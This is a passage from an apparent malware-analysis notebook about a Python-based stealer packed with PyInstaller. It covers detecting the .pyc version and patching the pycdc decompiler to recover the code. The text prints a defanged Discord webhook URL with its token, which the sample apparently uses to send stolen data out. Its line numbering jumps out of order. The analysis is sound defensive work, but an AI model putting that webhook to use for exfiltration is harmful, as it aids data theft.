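108 | "PYC_MAGICS = {3413: '3.8', 3425: '3.9', 3439: '3.10', 3495: '3.11', 3531: '3.12'}\n",
109 | "\n",
110 | "def pyc_version(path):\n",
111 | "    with open(path, 'rb') as f:\n",
112 | "        magic = struct.unpack('<H', f.read(2))[0]\n",
113 | "    return PYC_MAGICS.get(magic, 'unknown magic: %d' % magic)\n",
114 | "\n",
115 | "# e.g. the module dumped by pyinstxtractor-ng above\n",
116 | "print(pyc_version('creal.pyc'))\n",
117 | "```"
118 | ]
119 | },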
98 | {
99 | "cell_type": "markdown",
100 | "metadata": {},
101 | "source": [
102 | "### Decompiling Python PYC\n",
103 | "Depending on the Python version determined in the previous step Karsten's excellent [CPython Bytecode Reference Chart](https://struppigel.github.io/WisdomForHedgehogs/Execution%20Environments/CPython%20Bytecode%20Reversing/) can be used to determine the correct decompiler tool to use. Personally I prefer [pycdc](https://github.com/zrax/pycdc) because it can be easily modified to handle any version.\n",
104 | "\n",
105 | "#### Pycdc\n",
106 | "Currently pycdc cannot decompile python versions above 3.9 however it can disassemble them `pycdas`. This will return the disassembled python which is readable but not as easy to follow as the lifted python code.\n",
107 | "\n",
108 | "\n",
109 | "\n",
110 | "In our case the sample is using Python 3.12 and when we attempt to decompile it with pycdc we get some errors and only partial code recovery.\n",
111 | "```\n",
112 | "Unsupported opcode: BEFORE_WITH\n",
113 | "Unsupported opcode: LOAD_FAST_CHECK\n",
114 | "Unsupported opcode: BINARY_SLICE\n",
115 | "Unsupported opcode: JUMP_BACKWARD\n",
116 | "Unsupported opcode: JUMP_BACKWARD\n",
117 | "Unsupported opcode: JUMP_BACKWARD\n",
118 | "```\n",
119 | "\n",
120 | "##### Patched Pycdc\n",
121 | "We can modify pycdc to patch out the instruction case statement default return in `ASTRee.cpp` which causes the analysis to halt when an unknown instruction is encountered. By patching the return we force the analysis to continue. \n",
122 | "\n",
123 | "\n",
124 | "\n",
125 | "\n",
126 | "**Note** this will produce incorrect decompiled code, but depending on which instructions are missing the code may end up very readable, and the disassembly can be used to fill in the gaps. In our case we can fully recover the discord hook url `https[:]//discord[.]com/api/webhooks/1221491784937373859/LiPQTxogVAKpzUO2MXT3CjiqF4qFWy_HT3DpUCrG4D8E0ZVZAGR_3uHvfQog2a0DFQyV'` and the majority of the code!\n",
127 | "\n",
128 | "\n",
129 | "\n"
130 | ]
131 | },
132 | {
133 | "cell_type": "markdown",
134 | "metadata": {},
135 | "source": []
136 | }
137 | ],
138 | "metadata": {
139 | "language_info": {
140 | "name": "python"
141 | }
142 | },
143 | "nbformat": 4,
144 | "nbformat_minor": 2
145 | }
146 |
--------------------------------------------------------------------------------